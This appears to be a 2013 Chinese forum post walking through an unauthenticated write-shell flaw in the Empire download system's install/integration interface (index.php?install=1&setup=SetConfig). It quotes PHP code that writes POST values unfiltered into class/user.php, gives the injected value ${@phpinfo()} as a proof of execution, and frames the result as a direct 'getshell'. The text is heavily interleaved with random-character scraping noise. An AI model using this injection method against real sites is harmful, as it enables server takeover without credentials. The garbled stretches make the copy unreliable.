这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们" ^8 `4 x3 A/ ]* \' r& p
4 _2 m8 @- U. @; k: [
, N- P2 u; }; @
这是帝国的一套下载系统 如图' K3 n$ S% X. C, ^. A! l7 o
ps(不需要任何账户和密码,直接写shell) 6 ^: ] D+ F% g6 j" b8 z, W
由于很多站是由于下载要整合discuz 等等一些论坛....) H# @2 W4 `. U/ B, R# ?' f/ a( E
: v( x# E; x* z) }
而帝国他又有一个万能接口,如图
- j9 p7 Q# t* a7 H5 ?4 l+ b. K( J' s1 d
V r) s1 T: ?6 x3 c. V* c而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
3 H$ t0 Y. P$ R7 D! Y
4 ^! {4 C$ E" T4 G% z8 T当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪' e2 e0 P0 |9 N, Y" N2 V4 y6 a
( r" A: O9 a& Q+ ?在data/fun.php中的15行+ T7 G) `& U7 N' ?6 V$ j- {5 M
' P' |( N3 {$ n* M6 t
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. {4 K0 V ^1 S6 C
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干
2 T. l3 A5 y3 ~/ d1 A) Y6 n8 W7 e" m0 I. d/ }$ n
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);6 k) Q) [6 ]/ w9 u H
4 l" Q9 D1 |& K* z; E3 [
他将传进来的变量进行了切割,然后赋给了$filetext
) Q6 n, x2 f& C' Q$ L# d5 O9 x9 O7 E( {$ w- A8 |
然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了6 |% x7 d- H( n3 w7 Q% ^1 k
6 H1 {, g5 K, w) J我们看看写入的结果,随便填一个
: b1 s% [0 t N7 @6 {& r6 ?& n% I9 A
$ ^& c% d: N! @5 Q, S
8 ]$ k$ R8 h4 E5 ~: s+ N( D' b% U& F, \
5 e5 B6 U9 B$ W1 M
$ D1 U0 y9 M7 h' y/ o6 o
% N- n$ B# t" s3 `( @4 c) U! a9 N7 y& d. }9 h) K0 I! B) s
( `# r1 g* I$ G9 J0 O3 F" p, D$ C0 o% U! D( i& X
+ a1 J% C! U6 u- I3 m# Y
2 @% K0 q# s1 t0 {/ o
4 c. @1 l& I7 V, T' M3 e* y% g3 d# N1 b0 _
/ n" Z! m& A$ R: Z8 k/ i# ~: T
3 Z8 @. ]* @+ J* l# V
6 q9 a% V1 c9 P2 ?5 ]9 |$ r a
- d* K$ f( ^5 U- r4 c6 v9 w; ]4 N0 n$ t/ \$ y' i, z
: E0 t" [+ d/ J [. Z1 G
! |6 T, }0 ~3 ~; `$ ^4 g8 o, o* y* [
所以我们淫荡点,写个${@phpinfo()}试试 6 Q9 G) F- s, f. R. p( G( u
然后访问以下class/user.php这个文件
! A4 |1 Y- ]3 [1 E5 b# V6 Z2 p+ n日了吧 - V; z! r6 E9 }# Z& \
$ s5 e" C$ A- d
7 W1 L% r6 j3 S* \
; P% J2 m3 O" Y- ]( g0 K; G, l) U( K* O, R
9 d- X- H/ A7 v" T
| 
发表于 2013-1-23 09:34:37
收藏
支持
反对